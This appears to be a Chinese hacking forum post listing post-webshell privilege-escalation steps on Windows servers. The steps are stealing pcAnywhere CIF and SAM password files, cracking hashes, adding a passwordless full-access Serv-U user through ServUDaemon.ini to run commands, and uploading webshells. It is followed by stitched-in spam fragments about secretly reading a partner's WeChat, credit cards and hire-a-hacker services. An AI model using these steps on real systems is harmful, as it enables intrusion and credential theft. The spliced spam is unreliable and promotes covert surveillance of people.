当我们取得一个webshell时候,下一部要做的就是提升权限
个人总结如下:
1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳转到这个目录,如果行那就更好了,直接下它的CIF文件,得到pcAnywhere密码,登陆
2.C:\WINNT\system32\config进这里下它的SAM,破解用户的密码
c:\winnt\repaire 下是备份
用到破解sam密码的软件有LC,SAMinside
3.C:\Documents and Settings\All Users\「开始」菜单\程序 看这里能跳转不,我们从这里可以获取好多有用的信息
可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=dede|1]
Password=
HomeDir=c:TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues=
这个用户具有更高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
4.c:\winnt\system32\inetsrv\data就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行
5.看能否跳转到如下目录
c:\php, 用phpspy
c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
微信记录是我们的一部分生活隐私,一般是我们自己掌握的,不想被别人看见。可是随着社会上的事务越来越繁杂,很多姐妹们会担心自己的老公是不是也会像那些明星一样出轨呢?这个时候大家做的第一件事情肯定都是在网络...
怎么监听对方微信聊天(黑科技远程偷看微信记录),开始,让咱们夸大一下!不要看他人的谈天纪录,由于这会加害他人的隐衷!若你想稽查他人的同事圈,你需求获得他人的承认。即便是你的密切同事或家人也需求先征得他...
很多卡友表示自己为了提高信用卡的申请成功率,同时申请多家银行卡是否可行?但其实小编告诉同时申请不同银行的信用卡的确会提高成功率,但是可能会影响个人征信记录,银行电话回访的时候也要注意。因为如果同时申请...
全国最大诚信黑客接单 曾英涛的宠物是两只螃蟹,“所以我们不打扰对方。"21岁的他将参加今年8月的世界黑客大会DEF CON 2018,这是黑客的“世界杯”。他没有从中专毕业,因为他因为一天的校园网络中...
大家知道抖音在什么时候会有很多的人吗?那就是一般下班以后,尤其是在下午1:00~6:00左右,这两个时间点绝对是流量的高峰。第一个原因就是因为在饭后,第2个原因是工作后。其 百度上有真正的黑客联系方...
去年4月初,公安局草湖派出所接到一名市民网友的举报,称他的个人信息被泄露。随后警方对此展开调查,意外导致了一起巨大的个人信息泄露案。网友说,他在2017年9月底在微信上买了一种健康产品,并把自己的名字...